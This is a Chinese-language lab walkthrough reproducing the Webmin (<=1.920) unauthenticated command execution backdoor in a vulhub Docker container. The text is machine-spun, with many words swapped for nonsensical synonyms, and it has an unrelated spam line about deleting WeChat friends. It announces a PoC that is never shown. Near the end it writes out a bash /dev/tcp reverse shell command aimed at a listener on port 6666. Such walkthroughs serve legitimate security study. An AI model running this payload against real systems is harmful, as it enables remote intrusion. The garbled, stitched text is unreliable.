破绽形貌
克日webmin被发现存在一处远程下令执行破绽,经由剖析后,开端预测其为一次后门植入事宜,webmin是现在功效最壮大的基于web的unix系统治理工具,治理员通过浏览器接见webmin的种种治理功效并完成响应的治理动作,当用户开启webmin密码重置功效后,攻击者可以通过发送post请求在目的系统中执行随便下令,且无需身份验证。
影响局限:webmin <=1.920
破绽复现
进入到vuhub之后,就直接执行docker-compose up -d拉取镜像搭建
搭建好之后,直接接见192.168.1.1:10000 然则vuhub搭建的网站它是有问题的,以是要根据它报错的提醒去修改相当, 以是这里的话,就需要用https去接见,否则会不给接见:https://192.168.1.1:10000/
接着就是我们的破绽行使,接见https://192.168.67.135:10000/password_change.cgi,这样的话,去接见它是会报错的,以是这里我们需要去修改一下设置文件。
接着就是进入后台修改设置文件,这里的话,就直接用docker exec it id号 /bin/bash
进入到/etc/webmin目录下,查看config文件。我们要修改的内容是config中的referers_one=1这个设置。
然则在docker容器中,它是没有编辑器的,以是这里的话,我们需要安装一个vim编辑器
cat /etc/os-release先进入容器查看发行版,确定使用yum照样apt安装工具
可以看到使用的debian8的操作系统,接下来apt安装, apt install vim
微信如何彻底删除好友,永久性删除好友教程
接着就是编辑这个文件config,然后将referers_one=1改为referers_one=0
接着再去接见谁人路径就可以瞥见,我们这边的页面也发生了相对应的变换,它已经不报错了。
那么接下来的话,就是行使poc复现破绽,这里的话,要接见https://192.168.1.1:10000/password_change.cgi而且用burp抓包
使用网上的poc怼,看到乐成执行下令
poc如下
之后瞥见效果,很明显的乐成执行了下令。
执行一个whoami,它这里也乐成的输出相对应的权限
那么我们就要反弹shell,由于它这里可以执行执行下令,那么我们就可以直接执行bash -c “bash -i >& /dev/tcp/192.168.1.1/6666 0>&1” 吸收shell服务器的6666端口)
那么的话,执行这个下令,那么我们服务器那里就要监听6666,吸收反弹回来的shell。 这里的话,需要将payload进一方面的url编码再去执行
服务器那里监听6666端口吸收反弹回来的shell可以瞥见我们执行的payload,右边的页面一片空白,就说明乐成了。
然后就可以瞥见乐成的反弹了一个shell过来了。
本文来源于自互联网,不代表n5网立场,侵删。发布者:虚拟资源中心,转载请注明出处:https://www.n5w.com/245125.html
微信扫一扫 
